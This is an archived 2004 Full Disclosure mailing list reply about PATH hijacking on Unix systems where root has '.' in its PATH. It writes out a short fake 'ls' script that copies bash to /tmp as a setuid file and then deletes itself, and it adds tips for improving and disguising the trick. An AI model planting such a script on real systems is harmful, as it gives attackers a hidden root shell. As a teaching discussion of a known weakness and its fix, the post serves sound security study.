Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: Old LS Trojan?
From: Valdis.Kletnieks () vt edu
Date: Wed, 01 Dec 2004 17:03:43 -0500

On Wed, 01 Dec 2004 15:11:46 EST, "David S. Morgan" said:

I am looking for an old LS trojan, with trojan being a misnomer.  Essentially
, the scinario is that the admin (root) has a . (dot) in his path.

Geez.  I don't have it, but it's easy enough to write.

% cat > ./ls
/bin/cp /bin/bash /tmp/foobar
/bin/chmod 4755 /tmp/foobar
/bin/ls $*
/bin/rm -f $0
% chmod +x ./ls

(Fix the shell magic and lack of > and 2> redirects yourself.  Bonus points
for wrapping a check for $USER == root around the first 2 lines, and even
more for doing the *right* check ;)

And no, there's nothing in most "modern" unixoids that will "prevent" this
attack, other than not having '.' in the $PATH by default.

Incidentally, '.' at the front of $PATH is more dangerous for this, but I know
of at least one case where the sysadmin had '.' at the *end* and thought himself
safe - the attacker called it './sl' and waited for a typo (insider job, attacker
knew the admin was a poor typist ;)

Attachment: _bin

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]